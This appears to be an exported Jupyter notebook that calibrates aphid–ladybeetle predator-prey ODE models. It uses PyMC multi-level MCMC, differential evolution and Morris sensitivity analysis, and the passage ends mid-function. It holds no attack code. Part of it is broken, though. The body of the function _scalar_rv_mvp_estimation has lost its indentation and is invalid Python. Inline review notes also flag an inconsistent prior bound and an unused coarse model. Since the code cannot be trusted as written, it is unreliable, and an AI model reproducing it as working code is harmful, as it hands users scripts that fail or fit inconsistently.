# Fine (full-resolution) model for MLDA sampling; only r2 and r3 are
# calibrated, the remaining parameters are held fixed as data.
with pm.Model() as fine_model_AP2:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    r2_ = pm.Uniform(
        "r2",
        lower=(1.0 - percent_calibration) * r2,
        upper=(1.0 + percent_calibration) * r2,
    )
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + percent_calibration) * r3,
    )
    # a1_ = pm.Uniform(
    #     "a1",
    #     lower=(1.0 - percent_calibration) * a1,
    #     upper=(1.0 + percent_calibration) * a1,
    # )
    a1_ = pm.Data("a1", a1)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)
    # Priors for Initial Conditions (held fixed as data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP2_model",
        AP2_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse level 1 for MLDA: same model, every 4th observation.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters (same as the fine model)
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    r2_ = pm.Uniform(
        "r2",
        lower=(1.0 - percent_calibration) * r2,
        upper=(1.0 + percent_calibration) * r2,
    )
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + percent_calibration) * r3,
    )
    # a1_ = pm.Uniform(
    #     "a1",
    #     lower=(1.0 - percent_calibration) * a1,
    #     upper=(1.0 + percent_calibration) * a1,
    # )
    a1_ = pm.Data("a1", a1)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)
    # Priors for Initial Conditions (held fixed as data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP2_model",
        AP2_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse level 2 for MLDA: same model, every 2nd observation.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    r2_ = pm.Uniform(
        "r2",
        lower=(1.0 - percent_calibration) * r2,
        upper=(1.0 + percent_calibration) * r2,
    )
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + percent_calibration) * r3,
    )
    # a1_ = pm.Uniform(
    #     "a1",
    #     lower=(1.0 - percent_calibration) * a1,
    #     upper=(1.0 + percent_calibration) * a1,
    # )
    a1_ = pm.Data("a1", a1)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)
    # Priors for Initial Conditions (held fixed as data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 here, but the fine model and coarse_model_1
    # use lower=1 — possibly a typo; confirm the intended prior bound.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP2_model",
        AP2_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# Multi-Level Delayed Acceptance sampling on the fine AP2 model.
with fine_model_AP2:
    # NOTE(review): only coarse_model_1 is passed; coarse_model_2 defined
    # above is unused — confirm whether it should be included here.
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_AP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
# Quick visual check of the r2 posterior.
plt.hist(trace_calibration_AP2['r2'], bins=35)
plt.show()
# In[ ]:
# Variables summarized and plotted in the cells below.
calibration_variable_names = [
    "std_deviation",
    "r2",
    "r3",
]
# In[ ]:
# Plot and save the posterior histogram of each calibrated variable.
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_AP2[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_AP2.png")
# In[ ]:
# Pairwise joint posteriors (hexbin) with marginal distributions.
az.plot_pair(
    trace_calibration_AP2,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_AP2.png")
# In[ ]:
df_stats_summary = az.summary(
    data=trace_calibration_AP2,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding used in the summary
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the Most Probable Value (KDE mode) of each posterior variable.

    Scalar variables map directly to their MPV; vector-valued variables are
    decomposed per dimension and keyed as ``"name[dim]"`` in the result.
    """
    mpv_by_name = dict()
    progress = tqdm(variable_names)
    for name in progress:
        progress.set_description(f"Calculating MPV from KDE for {name}")
        realizations = pm_trace[f"{name}"]
        try:
            num_of_dimensions = realizations.shape[1]
        except IndexError:
            num_of_dimensions = 0
        if num_of_dimensions == 0:
            mpv_by_name[f"{name}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            for dim in range(num_of_dimensions):
                column = np.array(realizations[:, dim])
                mpv_by_name[f"{name}[{dim}]"] = _scalar_rv_mvp_estimation(column)
    return mpv_by_name
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of an ArviZ stats summary with an extra ``mpv`` column.

    The dict keys must match the summary's index (variable names); the
    original DataFrame is left untouched.
    """
    summary_with_mpv = arviz_summary.copy()
    summary_with_mpv["mpv"] = pd.Series(
        data=list(rv_modes_dict.values()), index=list(rv_modes_dict.keys())
    )
    return summary_with_mpv
# In[ ]:
# Append the KDE-based Most Probable Value to the ArviZ summary and persist it.
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_AP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_AP2.csv")  # save to a CSV for later reference
df_stats_summary
# In[ ]:
# 95% credible band (2.5th-97.5th percentiles) and median trajectory.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_AP2["AP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_AP2["AP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_AP2["AP2_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
plt.plot(
    time_observations,
    y_fit[:, 0],
    "r",
    label="Aphids (simulated)",
    marker="X",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
    time_observations,
    y_fit[:, 1],
    "b",
    label="Ladybeetles (simulated)",
    marker="o",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
    time_observations,
    aphid_observed.Density.values,
    label="Aphids data",
    marker="s",
    linestyle="",
    markersize=10
)
plt.plot(
    time_observations,
    ladybeetle_observed.Density.values,
    label="Ladybeetles data",
    marker="v",
    linestyle="",
    markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_AP2.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict()  # also store the realizations in a Python dict
# Skip the first entry ("std_deviation"): only model parameters are exported.
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
    progress_bar.set_description(f"Gathering {variable} realizations")
    parameter_realization = trace_calibration_AP2.get_values(f"{variable}")
    dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_AP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Allee Prey Growth FR3 model
# ## I can't reach a sinusoidal pattern for all calibrated parameters
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def AP3_model(
    t,
    X,
    r1=1,
    r2=1,
    r3=1,
    a1=1,
    a2=1,
    a3=1,
):
    """Right-hand side of the AP3 predator-prey ODE system.

    X = (u, v): prey (aphid) and predator (ladybeetle) densities.
    The prey growth term is the product of two quadratic factors in u, and
    predation follows a sigmoidal (u^2-based) functional response. The
    predator population is held constant (v' = 0) in this variant.
    """
    u, v = X
    growth = (r1 * u - r2 * u * u) * (r2 * u * u - r3 * u)
    predation = a1 * u * u * v / (a2 + a3 * u * u)
    u_prime = growth - predation
    v_prime = 0
    return u_prime, v_prime
def AP3_ode_solver(
    y0,
    t_span,
    t_eval,
    r1=1,
    r2=1,
    r3=1,
    a1=1,
    a2=1,
    a3=1,
):
    """Integrate the AP3 system with SciPy's LSODA.

    Returns the full ``solve_ivp`` result object (fields ``t`` and ``y``).
    """
    return solve_ivp(
        fun=AP3_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, r2, r3, a1, a2, a3),
        method="LSODA",
    )
# Time window for the deterministic fit; no forecasting beyond the data.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def AP3_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares misfit between model output and observations.

    ``fitting_model`` is called as
    ``fitting_model(initial_conditions, (t_min, t_max), time_exp, *par)``
    and must return an object with a ``y`` attribute holding the two
    simulated quantities of interest. A large penalty (1e15) is returned
    when the solver raises ValueError, so global optimizers simply discard
    that trial point.
    """
    observed_qoi1, observed_qoi2 = f_exp
    integration_window = (time_exp.min(), time_exp.max())
    weight_qoi1 = 1
    weight_qoi2 = 1
    num_of_qoi = len(f_exp)
    try:
        solution = fitting_model(
            initial_conditions, integration_window, time_exp, *par
        )
        # solution = fitting_model(integration_window, time_exp, *par)
        simulated_qoi1, simulated_qoi2 = solution.y
        sse_qoi1 = weight_qoi1 * np.sum((observed_qoi1 - simulated_qoi1) ** 2.0)
        sse_qoi2 = weight_qoi2 * np.sum((observed_qoi2 - simulated_qoi2) ** 2.0)
        objective_function = 1 / num_of_qoi * (sse_qoi1 + sse_qoi2)
    except ValueError:
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Differential Evolution progress callback: print the current best vector.

    Returning None tells scipy to keep iterating.
    """
    print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
seed = 1234
# Previously obtained estimates; they center the DE search bounds below.
r1=0.09096034819104581
r2=1.0447969232498829e-06
r3=0.002414772393279044
a1=0.001563078527810546
a2=1.0366698235781737
a3=0.0006702488786416308
# Bounds span [0.1x, 1.9x] of each reference value.
denom_min = 0.1
denom_max = 1.9
bounds_AP3 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ),  # r1
    ( ( r2 * denom_min ), ( r2 * denom_max ) ),  # r2
    ( ( r3 * denom_min ), ( r3 * denom_max ) ),  # r3
    ( ( a1 * denom_min ), ( a1 * denom_max ) ),  # a1
    ( ( a2 * denom_min ), ( a2 * denom_max ) ),  # a2
    ( ( a3 * denom_min ), ( a3 * denom_max ) ),  # a3
]
result_AP3 = optimize.differential_evolution(
    AP3_least_squares_error_ode,
    bounds=bounds_AP3,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        AP3_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000,  # 2000
    polish=True,
    disp=True,
    seed = seed,  # for the sake of reproducibility
    callback=callback_de,
    workers=-1,
)
print(result_AP3)
# * Retrieving the calibrated parameter values:
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
    r1_deterministic,
    r2_deterministic,
    r3_deterministic,
    a1_deterministic,
    a2_deterministic,
    a3_deterministic,
) = result_AP3.x
# Re-run the ODE with the calibrated parameters on a fine time grid.
solution_ODE_AP3 = AP3_ode_solver(
    y0,
    (t0, tf + days_to_forecast),
    time_range,
    *result_AP3.x
)
t_computed_AP3, y_computed_AP3 = solution_ODE_AP3.t, solution_ODE_AP3.y
u_AP3, v_AP3 = y_computed_AP3
parameters_dict = {
    "Model": "AP3",
    u"$r1$": r1_deterministic,
    u"$r2$": r2_deterministic,
    u"$r3$": r3_deterministic,
    u"$a1$": a1_deterministic,
    u"$a2$": a2_deterministic,
    u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "r3=" + str(r3_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
# Compare the calibrated trajectories against the raw observations.
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_AP3, u_AP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_AP3, v_AP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Morris (Elementary Effects) screening with +/-50% perturbations around the
# calibrated parameter values.
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
# Evaluate the least-squares objective at each Morris sample point.
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    residual_least_squares_result = AP3_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        AP3_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
# Normalize mu* so the indices sum to one across parameters.
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
    df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_AP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Morris screening again, now with the prey population time series (not the
# scalar objective) as the quantity of interest.
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
# One row of prey densities (over time) per Morris sample.
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_AP3 = AP3_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_AP3.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Analyze each time point independently; failures are skipped (bare except
# kept as in the original best-effort loop).
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except:
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_AP3.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_AP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the prey (pest) time derivative along a computed trajectory.

    Calls ``ode_model(t, [u, v], *model_pars)`` at each time point and keeps
    only the prey component of the returned rate pair.
    """
    derivatives = []
    for idx, t_value in enumerate(time_array):
        state = [u_array[idx], v_array[idx]]
        prey_rate, _ = ode_model(t_value, state, *model_pars)
        derivatives.append(prey_rate)
    return np.array(derivatives)
# In[ ]:
# Prey time-derivative along the calibrated trajectory.
pest_time_derivative_array = calculate_pest_time_derivative_series(
    t_computed_AP3,
    u_AP3,
    v_AP3,
    AP3_model,
    mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_AP3, u_AP3, '-x', label='Pest population')
plt.plot(t_computed_AP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_AP3.png", dpi=300)
plt.show()
# In[ ]:
# Morris screening with the prey time derivative as the quantity of interest.
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_AP3 = AP3_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_AP3.y
    pest_time_derivative_array = calculate_pest_time_derivative_series(
        time_range,
        u_realization,
        v_realization,
        AP3_model,
        parameters_realization
    )
    qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Per-time-point Morris analysis; failing time points are skipped.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except:
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_AP3.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_AP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,  # time grid
        t.dscalar,  # r1
        t.dscalar,  # r2
        t.dscalar,  # r3
        t.dscalar,  # a1
        t.dscalar,  # a2
        t.dscalar,  # a3
        t.dscalar,  # u0
        t.dscalar,  # v0
    ],
    otypes=[t.dmatrix]
)
def AP3_ode_wrapper(time_exp, r1, r2, r3, a1, a2, a3, u0, v0):
    """Theano-compatible wrapper around the AP3 solver.

    Integrates the system over the span of ``time_exp`` and returns the
    solution as an (n_times, 2) matrix with columns (u, v).
    """
    solution = solve_ivp(
        AP3_model,
        (time_exp.min(), time_exp.max()),
        np.array([u0, v0]),
        t_eval=time_exp,
        method='LSODA',
        args=[r1, r2, r3, a1, a2, a3]
    )
